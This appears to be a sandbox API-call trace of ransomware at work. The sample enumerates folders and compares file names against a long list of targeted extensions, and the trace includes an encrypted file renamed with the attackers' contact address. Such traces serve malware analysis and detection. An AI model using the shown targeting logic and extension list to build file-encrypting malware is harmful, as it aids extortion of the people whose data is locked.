	[0137.509] lstrlenW (lpString=".epsp") returned 5
	[0137.509] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1
	[0137.509] lstrlenW (lpString=".erf") returned 4
	[0137.509] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".exr") returned 4
	[0137.509] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".f4v") returned 4
	[0137.509] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".fido") returned 5
	[0137.509] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1
	[0137.509] lstrlenW (lpString=".flm") returned 4
	[0137.509] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".flv") returned 4
	[0137.509] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".frm") returned 4
	[0137.509] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".fxg") returned 4
	[0137.509] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".geo") returned 4
	[0137.509] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".gif") returned 4
	[0137.509] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".grs") returned 4
	[0137.509] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".gz") returned 3
	[0137.509] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1
	[0137.510] lstrlenW (lpString=".h") returned 2
	[0137.510] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1
	[0137.510] lstrlenW (lpString=".hdr") returned 4
	[0137.510] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".hpp") returned 4
	[0137.510] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".hta") returned 4
	[0137.510] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".htc") returned 4
	[0137.510] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".htm") returned 4
	[0137.510] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".html") returned 5
	[0137.510] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1
	[0137.510] lstrlenW (lpString=".icb") returned 4
	[0137.510] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".ics") returned 4
	[0137.510] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".iff") returned 4
	[0137.510] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".inc") returned 4
	[0137.510] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1
	[0137.510] lstrlenW (lpString=".indd") returned 5
	[0137.510] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1
	[0137.510] lstrlenW (lpString=".ini") returned 4
	[0137.510] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0
	[0137.510] FindNextFileW (in: hFindFile=0x7ba8408, lpFindFileData=0xae4f808 | out: lpFindFileData=0xae4f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf2c790c0, ftCreationTime.dwHighDateTime=0x1d58eed, ftLastAccessTime.dwLowDateTime=0xf2c790c0, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xf2d5d900, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[admin@sectex.net].bot", cAlternateFileName="DESKTO~1.BOT")) returned 1
	[0137.510] lstrlenW (lpString="desktop.ini.id-9C354B42.[admin@sectex.net].bot") returned 46
	[0137.510] lstrlenW (lpString=".1cd") returned 4
	[0137.510] lstrcmpiW (lpString1=".1cd", lpString2=".bot") returned -1
	[0137.510] lstrlenW (lpString=".3ds") returned 4
	[0137.510] lstrcmpiW (lpString1=".3ds", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".3fr") returned 4
	[0137.511] lstrcmpiW (lpString1=".3fr", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".3g2") returned 4
	[0137.511] lstrcmpiW (lpString1=".3g2", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".3gp") returned 4
	[0137.511] lstrcmpiW (lpString1=".3gp", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".7z") returned 3
	[0137.511] lstrcmpiW (lpString1=".7z", lpString2="bot") returned -1
	[0137.511] lstrlenW (lpString=".accda") returned 6
	[0137.511] lstrcmpiW (lpString1=".accda", lpString2="t].bot") returned -1
	[0137.511] lstrlenW (lpString=".accdb") returned 6
	[0137.511] lstrcmpiW (lpString1=".accdb", lpString2="t].bot") returned -1
	[0137.511] lstrlenW (lpString=".accdc") returned 6
	[0137.511] lstrcmpiW (lpString1=".accdc", lpString2="t].bot") returned -1
	[0137.511] lstrlenW (lpString=".accde") returned 6
	[0137.511] lstrcmpiW (lpString1=".accde", lpString2="t].bot") returned -1
	[0137.511] lstrlenW (lpString=".accdt") returned 6
	[0137.511] lstrcmpiW (lpString1=".accdt", lpString2="t].bot") returned -1
	[0137.511] lstrlenW (lpString=".accdw") returned 6
	[0137.511] lstrcmpiW (lpString1=".accdw", lpString2="t].bot") returned -1
	[0137.511] lstrlenW (lpString=".adb") returned 4
	[0137.511] lstrcmpiW (lpString1=".adb", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".adp") returned 4
	[0137.511] lstrcmpiW (lpString1=".adp", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".ai") returned 3
	[0137.511] lstrcmpiW (lpString1=".ai", lpString2="bot") returned -1
	[0137.511] lstrlenW (lpString=".ai3") returned 4
	[0137.511] lstrcmpiW (lpString1=".ai3", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".ai4") returned 4
	[0137.511] lstrcmpiW (lpString1=".ai4", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".ai5") returned 4
	[0137.511] lstrcmpiW (lpString1=".ai5", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".ai6") returned 4
	[0137.511] lstrcmpiW (lpString1=".ai6", lpString2=".bot") returned -1
	[0137.511] lstrlenW (lpString=".ai7") returned 4
	[0137.512] lstrcmpiW (lpString1=".ai7", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".ai8") returned 4
	[0137.512] lstrcmpiW (lpString1=".ai8", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".anim") returned 5
	[0137.512] lstrcmpiW (lpString1=".anim", lpString2="].bot") returned -1
	[0137.512] lstrlenW (lpString=".arw") returned 4
	[0137.512] lstrcmpiW (lpString1=".arw", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".as") returned 3
	[0137.512] lstrcmpiW (lpString1=".as", lpString2="bot") returned -1
	[0137.512] lstrlenW (lpString=".asa") returned 4
	[0137.512] lstrcmpiW (lpString1=".asa", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".asc") returned 4
	[0137.512] lstrcmpiW (lpString1=".asc", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".ascx") returned 5
	[0137.512] lstrcmpiW (lpString1=".ascx", lpString2="].bot") returned -1
	[0137.512] lstrlenW (lpString=".asm") returned 4
	[0137.512] lstrcmpiW (lpString1=".asm", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".asmx") returned 5
	[0137.512] lstrcmpiW (lpString1=".asmx", lpString2="].bot") returned -1
	[0137.512] lstrlenW (lpString=".asp") returned 4
	[0137.512] lstrcmpiW (lpString1=".asp", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".aspx") returned 5
	[0137.512] lstrcmpiW (lpString1=".aspx", lpString2="].bot") returned -1
	[0137.512] lstrlenW (lpString=".asr") returned 4
	[0137.512] lstrcmpiW (lpString1=".asr", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".asx") returned 4
	[0137.512] lstrcmpiW (lpString1=".asx", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".avi") returned 4
	[0137.512] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".avs") returned 4
	[0137.512] lstrcmpiW (lpString1=".avs", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".backup") returned 7
	[0137.512] lstrcmpiW (lpString1=".backup", lpString2="et].bot") returned -1
	[0137.512] lstrlenW (lpString=".bak") returned 4
	[0137.512] lstrcmpiW (lpString1=".bak", lpString2=".bot") returned -1
	[0137.512] lstrlenW (lpString=".bay") returned 4
	[0137.513] lstrcmpiW (lpString1=".bay", lpString2=".bot") returned -1
	[0137.513] lstrlenW (lpString=".bd") returned 3
	[0137.513] lstrcmpiW (lpString1=".bd", lpString2="bot") returned -1
	[0137.513] lstrlenW (lpString=".bin") returned 4
	[0137.513] lstrcmpiW (lpString1=".bin", lpString2=".bot") returned -1
	[0137.513] lstrlenW (lpString=".bmp") returned 4
	[0137.513] lstrcmpiW (lpString1=".bmp", lpString2=".bot") returned -1
	[0137.513] lstrlenW (lpString=".bz2") returned 4
	[0137.513] lstrcmpiW (lpString1=".bz2", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".c") returned 2
	[0137.513] lstrcmpiW (lpString1=".c", lpString2="ot") returned -1
	[0137.513] lstrlenW (lpString=".cdr") returned 4
	[0137.513] lstrcmpiW (lpString1=".cdr", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".cer") returned 4
	[0137.513] lstrcmpiW (lpString1=".cer", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".cf") returned 3
	[0137.513] lstrcmpiW (lpString1=".cf", lpString2="bot") returned -1
	[0137.513] lstrlenW (lpString=".cfc") returned 4
	[0137.513] lstrcmpiW (lpString1=".cfc", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".cfm") returned 4
	[0137.513] lstrcmpiW (lpString1=".cfm", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".cfml") returned 5
	[0137.513] lstrcmpiW (lpString1=".cfml", lpString2="].bot") returned -1
	[0137.513] lstrlenW (lpString=".cfu") returned 4
	[0137.513] lstrcmpiW (lpString1=".cfu", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".chm") returned 4
	[0137.513] lstrcmpiW (lpString1=".chm", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".cin") returned 4
	[0137.513] lstrcmpiW (lpString1=".cin", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".class") returned 6
	[0137.513] lstrcmpiW (lpString1=".class", lpString2="t].bot") returned -1
	[0137.513] lstrlenW (lpString=".clx") returned 4
	[0137.513] lstrcmpiW (lpString1=".clx", lpString2=".bot") returned 1
	[0137.513] lstrlenW (lpString=".config") returned 7
	[0137.514] lstrcmpiW (lpString1=".config", lpString2="et].bot") returned -1
	[0137.514] lstrlenW (lpString=".cpp") returned 4
	[0137.514] lstrcmpiW (lpString1=".cpp", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".cr2") returned 4
	[0137.514] lstrcmpiW (lpString1=".cr2", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".crt") returned 4
	[0137.514] lstrcmpiW (lpString1=".crt", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".crw") returned 4
	[0137.514] lstrcmpiW (lpString1=".crw", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".cs") returned 3
	[0137.514] lstrcmpiW (lpString1=".cs", lpString2="bot") returned -1
	[0137.514] lstrlenW (lpString=".css") returned 4
	[0137.514] lstrcmpiW (lpString1=".css", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".csv") returned 4
	[0137.514] lstrcmpiW (lpString1=".csv", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".cub") returned 4
	[0137.514] lstrcmpiW (lpString1=".cub", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".dae") returned 4
	[0137.514] lstrcmpiW (lpString1=".dae", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".dat") returned 4
	[0137.514] lstrcmpiW (lpString1=".dat", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".db") returned 3
	[0137.514] lstrcmpiW (lpString1=".db", lpString2="bot") returned -1
	[0137.514] lstrlenW (lpString=".dbf") returned 4
	[0137.514] lstrcmpiW (lpString1=".dbf", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".dbx") returned 4
	[0137.514] lstrcmpiW (lpString1=".dbx", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".dc3") returned 4
	[0137.514] lstrcmpiW (lpString1=".dc3", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".dcm") returned 4
	[0137.514] lstrcmpiW (lpString1=".dcm", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".dcr") returned 4
	[0137.514] lstrcmpiW (lpString1=".dcr", lpString2=".bot") returned 1
	[0137.514] lstrlenW (lpString=".der") returned 4
	[0137.515] lstrcmpiW (lpString1=".der", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".dib") returned 4
	[0137.515] lstrcmpiW (lpString1=".dib", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".dic") returned 4
	[0137.515] lstrcmpiW (lpString1=".dic", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".dif") returned 4
	[0137.515] lstrcmpiW (lpString1=".dif", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".divx") returned 5
	[0137.515] lstrcmpiW (lpString1=".divx", lpString2="].bot") returned -1
	[0137.515] lstrlenW (lpString=".djvu") returned 5
	[0137.515] lstrcmpiW (lpString1=".djvu", lpString2="].bot") returned -1
	[0137.515] lstrlenW (lpString=".dng") returned 4
	[0137.515] lstrcmpiW (lpString1=".dng", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".doc") returned 4
	[0137.515] lstrcmpiW (lpString1=".doc", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".docm") returned 5
	[0137.515] lstrcmpiW (lpString1=".docm", lpString2="].bot") returned -1
	[0137.515] lstrlenW (lpString=".docx") returned 5
	[0137.515] lstrcmpiW (lpString1=".docx", lpString2="].bot") returned -1
	[0137.515] lstrlenW (lpString=".dot") returned 4
	[0137.515] lstrcmpiW (lpString1=".dot", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".dotm") returned 5
	[0137.515] lstrcmpiW (lpString1=".dotm", lpString2="].bot") returned -1
	[0137.515] lstrlenW (lpString=".dotx") returned 5
	[0137.515] lstrcmpiW (lpString1=".dotx", lpString2="].bot") returned -1
	[0137.515] lstrlenW (lpString=".dpx") returned 4
	[0137.515] lstrcmpiW (lpString1=".dpx", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".dqy") returned 4
	[0137.515] lstrcmpiW (lpString1=".dqy", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".dsn") returned 4
	[0137.515] lstrcmpiW (lpString1=".dsn", lpString2=".bot") returned 1
	[0137.515] lstrlenW (lpString=".dt") returned 3
	[0137.515] lstrcmpiW (lpString1=".dt", lpString2="bot") returned -1
	[0137.515] lstrlenW (lpString=".dtd") returned 4
	[0137.515] lstrcmpiW (lpString1=".dtd", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".dwg") returned 4
	[0137.516] lstrcmpiW (lpString1=".dwg", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".dwt") returned 4
	[0137.516] lstrcmpiW (lpString1=".dwt", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".dx") returned 3
	[0137.516] lstrcmpiW (lpString1=".dx", lpString2="bot") returned -1
	[0137.516] lstrlenW (lpString=".dxf") returned 4
	[0137.516] lstrcmpiW (lpString1=".dxf", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".edml") returned 5
	[0137.516] lstrcmpiW (lpString1=".edml", lpString2="].bot") returned -1
	[0137.516] lstrlenW (lpString=".efd") returned 4
	[0137.516] lstrcmpiW (lpString1=".efd", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".elf") returned 4
	[0137.516] lstrcmpiW (lpString1=".elf", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".emf") returned 4
	[0137.516] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".emz") returned 4
	[0137.516] lstrcmpiW (lpString1=".emz", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".epf") returned 4
	[0137.516] lstrcmpiW (lpString1=".epf", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".eps") returned 4
	[0137.516] lstrcmpiW (lpString1=".eps", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".epsf") returned 5
	[0137.516] lstrcmpiW (lpString1=".epsf", lpString2="].bot") returned -1
	[0137.516] lstrlenW (lpString=".epsp") returned 5
	[0137.516] lstrcmpiW (lpString1=".epsp", lpString2="].bot") returned -1
	[0137.516] lstrlenW (lpString=".erf") returned 4
	[0137.516] lstrcmpiW (lpString1=".erf", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".exr") returned 4
	[0137.516] lstrcmpiW (lpString1=".exr", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".f4v") returned 4
	[0137.516] lstrcmpiW (lpString1=".f4v", lpString2=".bot") returned 1
	[0137.516] lstrlenW (lpString=".fido") returned 5
	[0137.516] lstrcmpiW (lpString1=".fido", lpString2="].bot") returned -1
	[0137.516] lstrlenW (lpString=".flm") returned 4
	[0137.517] lstrcmpiW (lpString1=".flm", lpString2=".bot") returned 1
	[0137.517] lstrlenW (lpString=".flv") returned 4
	[0137.517] lstrcmpiW (lpString1=".flv", lpString2=".bot") returned 1
	[0137.517] lstrlenW (lpString=".frm") returned 4
	[0137.517] lstrcmpiW (lpString1=".frm", lpString2=".bot") returned 1
	[0137.517] lstrlenW (lpString=".fxg") returned 4
	[0137.517] lstrcmpiW (lpString1=".fxg", lpString2=".bot") returned 1
	[0137.517] lstrlenW (lpString=".geo") returned 4
	[0137.517] lstrcmpiW (lpString1=".geo", lpString2=".bot") returned 1
	[0137.517] lstrlenW (lpString=".gif") returned 4
	[0137.517] lstrcmpiW (lpString1=".gif", lpString2=".bot") returned 1
	[0137.517] lstrlenW (lpString=".grs") returned 4
	[0137.517] lstrcmpiW (lpString1=".grs", lpString2=".bot") returned 1
	[0140.014] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.014] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 1
	[0140.015] FindNextFileW (in: hFindFile=0x7ba8b08, lpFindFileData=0xae4f094 | out: lpFindFileData=0xae4f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.015] FindNextFileW (in: hFindFile=0x7ba8b08, lpFindFileData=0xae4f094 | out: lpFindFileData=0xae4f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f046d00, ftCreationTime.dwHighDateTime=0x1bd9a89, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f046d00, ftLastWriteTime.dwHighDateTime=0x1bd9a89, nFileSizeHigh=0x0, nFileSizeLow=0xf77, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143743.GIF", cAlternateFileName="")) returned 1
	[0140.039] FindNextFileW (in: hFindFile=0x7ba8b88, lpFindFileData=0xae4f58c | out: lpFindFileData=0xae4f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.040] FindNextFileW (in: hFindFile=0x7ba8b88, lpFindFileData=0xae4f58c | out: lpFindFileData=0xae4f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f664b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f664b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd0aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.thmx", cAlternateFileName="ADJACE~1.THM")) returned 1
	[0140.048] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c9cf70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x603f4990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.048] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5300, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xccc5300, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.xml", cAlternateFileName="ADJACE~1.XML")) returned 1
	[0140.052] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5caf100, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.053] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c8a500, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe591d000, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x61c8a500, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x5261, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.eftx", cAlternateFileName="ADJACE~1.EFT")) returned 1
	[0140.057] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a9ed0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6187c750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6187c750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.058] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5300, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x61830490, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xccc5300, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.xml", cAlternateFileName="ADJACE~1.XML")) returned 1
	[0140.061] FindNextFileW (in: hFindFile=0x7ba8b88, lpFindFileData=0xae4f58c | out: lpFindFileData=0xae4f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.061] FindNextFileW (in: hFindFile=0x7ba8b88, lpFindFileData=0xae4f58c | out: lpFindFileData=0xae4f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10", cAlternateFileName="")) returned 1
	[0140.063] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0140.063] FindNextFileW (in: hFindFile=0x7ba8b48, lpFindFileData=0xae4f310 | out: lpFindFileData=0xae4f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeec79e70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1
	[0140.064] FindNextFileW (in: hFindFile=0x7ba8b08, lpFindFileData=0xae4f094 | out: lpFindFileData=0xae4f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeec79e70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
